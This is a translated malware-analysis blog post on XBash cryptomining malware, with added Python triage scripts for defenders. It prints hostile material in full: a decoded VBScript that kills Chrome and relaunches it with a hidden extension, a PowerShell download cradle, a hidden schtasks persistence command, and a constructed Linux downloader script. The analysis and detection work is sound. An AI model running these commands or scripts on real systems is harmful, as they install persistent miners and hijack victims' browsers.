2025-03-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
The virus samples were downloaded from the thread "XBash Series virus sample Analysis report" by user cq5f7a075d; they are XBash malware used by the Iron Group. Sample link: https://bbs.ichunqiu.com/thread-47475-1-1.html. Several active sample-download communities are worth recommending, such as Kafan, iChunqiu, "my love", VirusShare and so on.
The story again starts with a drive-by download ("hanging horse") site, that is, a web page that downloads malicious code, as shown below:
Picture 1: JScript script
The variable ebc9 is loaded into 010 Editor and converted into a string, as follows:
Picture 2: array restore
The restored JS code is shown below; the restored code is marked in red in the picture:
Picture 3: code recovery
As the code above shows, the script does the following:
1. Uses an ActiveX control. Note that this only works in IE, because ActiveX belongs to Microsoft.
2. Gets the temporary (temp) path and appends the IE browser process name to it (camouflage).
3. Checks whether the temporary file exists and, if it does not, executes the following PowerShell command:
Powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(...)   (the arguments are not reproduced on the page)
DownloadFile fetches the remote script; -executionpolicy bypass skips the execution policy and -windowstyle hidden hides the execution window. PowerShell commands are generally not blocked by antivirus software, so the goal of downloading the malicious code and disguising it as explorer.exe is achieved.
4. Executes the downloaded malicious code.
With the drive-by site analysed, next comes the malicious code it downloads, as shown below:
Picture 4: unpacking
As shown above, the sample is packed with UPX. After unpacking and repairing the IAT, the sample is restored; loaded into IDA it looks as follows:
Picture 5: main function
The analysis of sub_405920 is as follows. First, the path of a Windows shell special folder is obtained from its identifier, as shown below:
Picture 6: SHGetSpecialFolderPathA
Continuing the analysis, a string is then initialised and its size calculated; the flow chart is as follows:
Picture 7: string
Initially, static observation led to a wrong guess about the order of the initialised string, so dynamic debugging was used to verify the data. The following function flow is then called: the name is obtained from the initialised string and a lock mechanism is set up, as follows:
Picture 8: execution process
The name is obtained from the string operation and the concatenated path is as follows:
Picture 9: C:\Program Files\TempBMBD19XS
The real work has not started yet; this was just a warm-up. Next the sample gets serious, as shown below:
Picture 10: static Analysis
As shown in the figure above, it obtains its own running path and appends chrome.crx. Once that path exists, it takes action, as shown below:
Picture 11: chrome.crx
The analysis continues with sub_408360, using dynamic debugging to recover the strings. Because the strings are encrypted, dynamic debugging is the easier way to analyse them. The internal code is as follows:
Picture 12: sub_408360
When parsing sub_40D0B0, part of the code was guessed from the loop pattern during static assembly analysis (unfortunately wrongly). Looking at the string decryption in OllyDbg (OD), the call to CreateToolhelp32Snapshot makes it clear that this creates a process snapshot, which explains the whole function, as shown below:
Picture 13: sub_40D0B0.CreateToolhelp32Snapshot
It traverses the processes and kills the chrome process, as shown below:
Picture 14: Kill chrome.exe
As shown in the figure above, after this layer, the current analysis shows that the sample must prepare chrome.exe (chrome.crx) to continue under this camouflage. Linear analysis continues as in Picture 12:
1. Open the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe and query the Path value.
2. If concatenating the path C:\Program Files\Google\Chrome\Application\chrome.exe succeeds, create a file under that path and write the data into it, as follows:
Picture 15: _mkdir and write
It unpacks the data, finishes up, and uses a schtasks scheduled task to start the released program, as follows:
Picture 16: WinExec
sub_408360 has thus gloriously fulfilled its mission: it killed the chrome.exe process, created a file into which the malicious code was released, and called WinExec to execute it.
After doing all this, it is still not over. At the watershed, the sample's check of its own command-line parameters is interesting. The analysis is as follows:
Picture 17: watershed
If the parameters are not equal it jumps; if they are equal, the execution flow is as shown in the following figure:
Picture 18: success
This article focuses on the non-jump case (on a real machine there is no jump), as follows:
Picture 19: create and write malicious code
If you are familiar with the chrome.crx decompression assembly above, you will find that the routine is the same:
1. Get the file name and concatenate the file path.
2. Create the file and write the malicious code into it.
3. Execute the malicious code.
Let's compare whether the data written is the same, to verify the correctness of the function, as shown below:
Picture 20: write malicious data
The process of launching rundll32.exe to call DllUnInstall in the newly created malicious code is as follows:
Picture 21: execute malicious dll
Then ExitProcess is called to end its own life. So the virus downloaded from the drive-by site did two things:
1. Run sec.vbe
2. Run xxx.dat (a DLL with a random name)
The goal is therefore very clear. The two programs that are run are analysed in turn; the order in which they run is sometimes deliberately arranged. Next, analyse sec.vbe:
Judging by the suffix, this is a virus written in VBScript (.vbe is Microsoft's encoded VBScript). Open it first and see what it looks like, as shown in the following figure:
Picture 22: encoded sec.vbe
Judging by the style, it should be encoded with Microsoft's Script Encoder algorithm, so try that first; just decode it. The decoded code is as follows:
In VBScript a comment begins with a single quote. The decoded script, reformatted one statement per line with the comments from the analysis:

    On Error Resume Next                      ' exception handling: keep running when an error occurs
    strComputer = "."
    ' Set assigns an object reference; GetObject returns the WMI (ActiveX) object
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
    ' ExecQuery runs a WQL query: here, every running chrome.exe process
    Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Process where name='chrome.exe'", 48)
    Set objShell = CreateObject("WScript.Shell")   ' create the WScript.Shell object
    start = False
    ' traverse the processes and compare their command line with the keyword
    For Each objItem In colItems
        If InStr(objItem.CommandLine, "silent-launch") > 1 Then   ' VBScript identifiers and InStr are case-insensitive
            start = True
        End If
    Next
    ' process-killing function
    Function KillProc(strProcName)
        On Error Resume Next
        Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
        Set arrProcesses = objWMIService.ExecQuery("select * from win32_process where Name ='" & strProcName & "'")
        For Each Proccess In arrProcesses
            Proccess.Terminate 0              ' Terminate ends the process
        Next
    End Function
    If Not start Then
        KillProc("chrome.exe")                ' kill the process
        Dim InstPath                          ' declare the variable
        ' read the Chrome install path from the registry
        InstPath = objShell.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\Path")
        appDataLocation = objShell.ExpandEnvironmentStrings("%LOCALAPPDATA%")   ' get path C:\Users\xxx\AppData\Local
        chrome_location = appDataLocation + "\chrome"                           ' concatenated path C:\Users\xxx\AppData\Local\chrome
        objShell.Exec(InstPath + "\chrome.exe --load-extension=" + chrome_location + " --silent-launch --enable-automation")
        ' --load-extension: every time Chrome restarts, the extension in C:\Users\xxx\AppData\Local\chrome is loaded (the shortcut is replaced)
        ' --silent-launch: Chrome starts silently, without a window
        ' --enable-automation: turns on automation
    End If
How to decode it? Use the online decoder at https://www.jb51.net/tools/onlinetools/jiemi/jsendecode.htm
The VB script analysis above adds detailed comments on the key data, so it will not be repeated here: sec.vbe closes Chrome and then replaces the Chrome shortcut.
As for the .dat, it is a DLL. PEiD shows it is packed with a VMProtect (vmp) virtualisation shell. For this shell, debugging with the shell in place is possible once the virtualisation and anti-debugging are dealt with. Interested readers can analyse it themselves; with limited ability the steps of this virus cannot be analysed well here, so this rather critical link is skipped.
What does the DLL do when executed (that is, the .dat DLL whose analysis was omitted above)?
1. On Windows, it releases a piece of executable malicious code that includes a PowerShell instruction (used to download the miner).
2. On Linux, it releases a .sh script (used for process killing and downloading the miner).
In effect, two downloaders are released; let's analyse them.
The PowerShell downloader under Windows is as follows:
Pre-knowledge:
1. -EncodedCommand accepts a Base64-encoded string version of the command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces. In the sample it appears as -E.
2. -WindowStyle sets the window style to Normal, Minimized, Maximized, or Hidden. In the sample it appears as -W.
3. -NoProfile (abbreviated -NoP) does not load the Windows PowerShell profile.
4. -NonInteractive does not present an interactive prompt to the user.
Opening the .ps1 script, we find that it is encoded, as shown below:
Picture 23: encrypted Powershell instruction
Based on the -E parameter, we can infer that the whole command is Base64-encoded. After online Base64 decoding, the following is shown:
Picture 24: Base64 decryption
After the first Base64 decoding, although a large number of characters are still unreadable, some key data such as iex are exposed, which gives an idea for further decoding. The script contains the IEX keyword; we remove it and redirect the output to a new file to decode it. The decoded data is shown below:
Picture 25: Base64 decryption
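To turn the manual decoding above (Pictures 23 to 25) and the command lines seen earlier (the PowerShell download cradle at the JScript stage and the chrome.exe launch from sec.vbe) into a repeatable check, here is an added Python triage script. It is my example, not code from the analysis or the sample: it peels the -EncodedCommand (UTF-16LE in Base64) and FromBase64String layers in the same order the manual steps do, then labels indicator strings on every layer. The command lines in it are constructed for the example, example.invalid is a placeholder host, and the indicator list and labels are my own choice.

```python
import base64
import re

# Added example, not the sample's or the author's code. Indicator patterns are
# applied to lower-cased text, so they are written in lower case.
INDICATORS = [
    (r"downloadfile|downloadstring", "WebClient download cradle"),
    (r"\biex\b|invoke-expression", "Invoke-Expression of generated code"),
    (r"-(?:e|ec|encodedcommand)\s+[a-z0-9+/=]{20,}", "-EncodedCommand payload"),
    (r"-(?:executionpolicy|ep)\s+bypass", "execution policy bypass"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-nop(?:rofile)?\b", "profile suppressed"),
    (r"frombase64string", "embedded Base64 literal"),
    (r"chrome\.exe.*--load-extension=", "chrome started with a side-loaded extension"),
    (r"--silent-launch", "chrome silent launch"),
]
ENC_RE = re.compile(r"-(?:e|ec|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
B64_LIT_RE = re.compile(r"frombase64string\(\s*['\"]([A-Za-z0-9+/=]{20,})['\"]\s*\)", re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries the script as UTF-16LE text, Base64-encoded."""
    return base64.b64decode(b64).decode("utf-16-le", errors="replace")


def decode_b64_literal(b64: str) -> str:
    """A FromBase64String literal may hold UTF-8 or UTF-16LE text; NUL bytes tell them apart."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le" if b"\x00" in raw else "utf-8", errors="replace")


def peel_layers(cmdline: str, max_depth: int = 5) -> list:
    """Return the command line followed by each decoded layer found inside it."""
    layers = [cmdline]
    for _ in range(max_depth):
        m = ENC_RE.search(layers[-1])
        if m:
            layers.append(decode_encoded_command(m.group(1)))
            continue
        m = B64_LIT_RE.search(layers[-1])
        if m:
            layers.append(decode_b64_literal(m.group(1)))
            continue
        break
    return layers


def triage(cmdline: str) -> dict:
    """Label every indicator on every layer; each label is reported once, with the depth it was first seen."""
    layers = peel_layers(cmdline)
    hits, seen = [], set()
    for depth, text in enumerate(layers):
        low = text.lower()
        for pattern, label in INDICATORS:
            if label not in seen and re.search(pattern, low):
                seen.add(label)
                hits.append((depth, label))
    return {"layers": len(layers), "hits": hits, "innermost": layers[-1]}


def _b64(text: str, encoding: str) -> str:
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed samples (not the real sample's data); example.invalid is a placeholder host.
_INNER = ("(new-object system.net.webclient).downloadfile("
          "'http://example.invalid/a.ps1', \"$env:TMP\\tmp.jpg\")")
_WRAPPER = ("iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
            + _b64(_INNER, "utf-8") + "')))")
SAMPLE_PS_CMDLINE = "Powershell.exe -NoP -W hidden -E " + _b64(_WRAPPER, "utf-16-le")
SAMPLE_CHROME_CMDLINE = (r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                         r"--load-extension=C:\Users\xxx\AppData\Local\chrome "
                         "--silent-launch --enable-automation")

if __name__ == "__main__":
    for line in (SAMPLE_PS_CMDLINE, SAMPLE_CHROME_CMDLINE):
        result = triage(line)
        print(result["layers"], "layer(s):", [label for _, label in result["hits"]])
        print("  innermost:", result["innermost"][:80])
```

Run as a script it prints the labels for both constructed command lines; fed process-creation logs it gives the same "decode, then look for iex / downloadfile" result the manual steps above produced, without stopping at the first Base64 layer.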
Analyse the DllMiner function as follows:
Picture 26: Function DllMiner
The function downloads the data, extracts the actual malicious code and writes it to a file named tmp.jpg, executes the downloaded file, and then writes the DllMiner function into tmp.ps1, as follows:
Picture 27: tmp.ps1
SchTasks.exe is called to register the scheduled task, as shown below:
SchTasks.exe /Create /SC MINUTE /TN "Update" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $env:TMP\tmp.ps1" /MO 6
Parameter introduction:
1. /Create creates a new scheduled task.
2. /TN taskname specifies the name that uniquely identifies the scheduled task.
3. /ST starttime specifies the start time of the task; /SC MINUTE sets the schedule type (minute).
4. /TR taskrun specifies the path of the program run at the scheduled time.
5. /MO modifier refines the schedule type to allow finer control over the repetition.
Summary: run tmp.ps1, that is, the DllMiner function, once a minute.
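The schtasks line above is the persistence mechanism, so it is worth checking for in process-creation logs. The following is an added Python example (my code, not the author's or the sample's) that parses a schtasks.exe command line into its switches, computes the repetition interval (with /SC MINUTE the /MO value is the number of minutes between runs, so the page's line yields 6) and flags the combination the analysis describes: a high-frequency schedule whose action is hidden, policy-bypassing PowerShell running a script from a temp directory. The page's own command line is used as the first sample; the benign second line and the scoring rules are constructed for the example.

```python
import re

# Added example, not the sample's or the author's code.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
ACTIONS = {"CREATE", "DELETE", "QUERY", "CHANGE", "RUN", "END"}
SCHEDULE_MINUTES = {"MINUTE": 1, "HOURLY": 60, "DAILY": 1440}
# substrings looked for in the /TR action (lower-cased), with the reason reported
SUSPICIOUS_TR = [
    ("powershell", "action runs PowerShell"),
    ("bypass", "execution policy bypassed"),
    ("hidden", "window hidden"),
    ("$env:tmp", "script lives in a temp directory"),
    ("%temp%", "script lives in a temp directory"),
]


def tokenize(cmdline: str) -> list:
    """Split on whitespace, keeping double-quoted arguments whole (quotes removed)."""
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse_schtasks(cmdline: str):
    """Return {'action': NAME, 'switches': {NAME: value or True}}, or None if not schtasks."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("schtasks", "schtasks.exe"):
        return None
    parsed = {"action": None, "switches": {}}
    i = 1
    while i < len(toks):
        tok = toks[i]
        if not tok.startswith("/"):
            i += 1
            continue
        name = tok[1:].upper()
        if name in ACTIONS:
            parsed["action"] = name
            i += 1
        elif i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            parsed["switches"][name] = toks[i + 1]   # switch that takes a value
            i += 2
        else:
            parsed["switches"][name] = True          # bare flag such as /F
            i += 1
    return parsed


def interval_minutes(parsed: dict):
    """Repetition interval in minutes: the /SC base unit times the /MO modifier."""
    base = SCHEDULE_MINUTES.get(str(parsed["switches"].get("SC", "")).upper())
    if base is None:
        return None
    try:
        return base * int(parsed["switches"].get("MO", 1))
    except (TypeError, ValueError):
        return None


def assess(cmdline: str):
    """Score a task-creation command line; None for anything that is not 'schtasks /Create'."""
    parsed = parse_schtasks(cmdline)
    if parsed is None or parsed["action"] != "CREATE":
        return None
    action = str(parsed["switches"].get("TR", "")).lower()
    reasons = []
    for needle, why in SUSPICIOUS_TR:
        if needle in action and why not in reasons:
            reasons.append(why)
    every = interval_minutes(parsed)
    if every is not None and every <= 10:
        reasons.append(f"high-frequency schedule: every {every} minute(s)")
    return {"task": parsed["switches"].get("TN"), "every_minutes": every,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


# First line is the one from the analysis above; the second is a constructed benign task.
SAMPLE_SCHTASKS = r'''SchTasks.exe /Create /SC MINUTE /TN "Update" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $env:TMP\tmp.ps1" /MO 6'''
BENIGN_SCHTASKS = r'''schtasks /Create /SC DAILY /TN "Backup" /TR "C:\Tools\backup.exe" /ST 02:00'''

if __name__ == "__main__":
    for line in (SAMPLE_SCHTASKS, BENIGN_SCHTASKS):
        print(assess(line))
```

The threshold of two reasons is deliberately loose: a single hit such as "powershell" in /TR is common in legitimate administration, while the page's line trips all five rules.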
What is downloaded is in fact the mining program; the miner itself is not analysed here, and interested readers can analyse it.
Addendum:
1. Can't the computer run PowerShell scripts? If an error is reported, modify the execution policy; the modified configuration is shown in the following figure:
Picture 28: PowerShell policy configuration
2. Introduction to PowerShell IEX obfuscation and decoding: https://www.codercto.com/a/24286.html
The .sh downloader under Linux is as follows:
Take a look at how the .sh script runs under Linux, as follows:
Picture 29
The entire script is an endless loop calling two functions; the kills function is as follows:
Picture 30
It uses all kinds of kill and pkill commands to terminate other programs' mining processes. Then the downloadyam function runs, as shown below:
Picture 21
The red marks above are comments describing the script's execution. In total, xx.sh downloads five files:
config.json, bashf, pools.txt, bashg, XbashY
That concludes the analysis of the two downloaders; the analysis of the mining programs is left out for now. After further study, the unanalysed parts will be filled in.
To be continued!
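To triage a shell downloader of this shape without running it, a defender mostly wants three facts: does it loop forever, how many process-killing commands does it issue, and which files does it fetch and where does it put them (those names feed a blocklist or a host sweep). The following is an added Python example, my code and not the author's or the sample's, that extracts exactly that from script text. The script it inspects is constructed for the example: it only mirrors the structure described above (infinite loop, kills function, downloadyam function fetching the five file names listed), and placeholder.invalid is a placeholder host.

```python
import os
import re
import shlex

# Added example, not the sample's or the author's code.
DOWNLOADERS = {"wget", "curl"}
KILLERS = {"kill", "pkill", "killall"}
LOOP_RE = re.compile(r"^\s*(?:while\s+(?:true|:|\[\s*1\s*\])\s*;?\s*do|for\s*\(\(\s*;\s*;\s*\)\))")
URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def split_line(cmd: str) -> list:
    """shlex-split one simple command; fall back to whitespace on unbalanced quotes."""
    try:
        return shlex.split(cmd, comments=True)
    except ValueError:
        return cmd.split()


def download_target(tokens: list):
    """For a wget/curl invocation return (url, destination); None for anything else.
    Handles wget -O/-P and curl -o; otherwise the destination is the URL basename."""
    tool = os.path.basename(tokens[0])
    if tool not in DOWNLOADERS:
        return None
    url = next((t for t in tokens[1:] if URL_RE.match(t)), None)
    name = url.rsplit("/", 1)[-1] if url else None
    dest = name
    for i, tok in enumerate(tokens[1:], 1):
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tool == "wget" and tok in ("-O", "--output-document") and nxt:
            dest = nxt
        elif tool == "wget" and tok in ("-P", "--directory-prefix") and nxt and name:
            dest = nxt.rstrip("/") + "/" + name
        elif tool == "curl" and tok in ("-o", "--output") and nxt:
            dest = nxt
    return (url, dest)


def triage_script(text: str) -> dict:
    """Static summary of a shell script: endless loop, kill commands, download targets."""
    downloads, kills, loop = [], 0, False
    for line in text.splitlines():
        if LOOP_RE.match(line):
            loop = True
        # a line may chain several simple commands with ';', '&&' or '||'
        for cmd in re.split(r";|&&|\|\|", line):
            tokens = split_line(cmd)
            if not tokens:
                continue
            if os.path.basename(tokens[0]) in KILLERS:
                kills += 1
            target = download_target(tokens)
            if target:
                downloads.append(target)
    return {"loop_forever": loop, "kill_commands": kills, "downloads": downloads}


# Constructed script mirroring the structure described above; host is a placeholder.
SAMPLE_SCRIPT = """#!/bin/bash
kills() {
    pkill -f minerd
    pkill -f xmrig
    kill -9 $(pgrep -f cryptonight) 2>/dev/null
}
downloadyam() {
    wget -q http://placeholder.invalid/config.json -O /tmp/config.json
    curl -s -o /tmp/bashf http://placeholder.invalid/bashf
    wget -q -O /tmp/pools.txt http://placeholder.invalid/pools.txt
    curl -s http://placeholder.invalid/bashg -o /tmp/bashg
    wget http://placeholder.invalid/XbashY -P /tmp
    chmod +x /tmp/bashf /tmp/bashg /tmp/XbashY
    nohup /tmp/XbashY >/dev/null 2>&1 &
}
while true; do
    kills
    downloadyam
    sleep 300
done
"""

if __name__ == "__main__":
    summary = triage_script(SAMPLE_SCRIPT)
    print("endless loop:", summary["loop_forever"], "| kill commands:", summary["kill_commands"])
    for url, dest in summary["downloads"]:
        print(f"  {url} -> {dest}")
```

The destination paths it recovers are what you would search for on a suspected host, and the URLs are what you would add to egress blocking; the kill-command count is a quick tell for the "evict competing miners" behaviour the kills function implements.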